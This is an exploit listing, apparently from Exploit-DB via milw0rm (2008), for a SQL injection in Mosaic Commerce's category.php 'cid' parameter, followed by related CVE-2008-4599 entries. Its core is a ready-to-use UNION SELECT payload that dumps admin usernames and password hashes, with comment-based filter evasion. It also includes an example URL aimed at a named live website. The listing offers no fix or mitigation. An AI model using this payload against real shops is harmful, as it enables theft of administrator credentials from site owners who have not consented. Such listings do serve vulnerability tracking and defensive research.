Lucene search
Ali AbbasiEDB-ID:6763HistoryOct 16, 2008 - 12:00 a.m.
Mosaic Commerce - 'cid' SQL Injection
2008-10-1600:00:00
Ali Abbasi
www.exploit-db.com
85
AI Score
7.4
Confidence
Low
Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
{SQL BUG}
/mosaic-path/category.php?cid=[SQL]
Exploit For Get Admin Username And Password Hash:
category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
Example:
http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
# milw0rm.com [2008-10-16]Related
prion
prion
Sql injection
2008-10-18 00:18:00
cve
cve
CVE-2008-4599
2008-10-18 00:18:53
cvelist
cvelist
CVE-2008-4599
2008-10-17 22:00:00
nvd
nvd
CVE-2008-4599
2008-10-18 00:18:53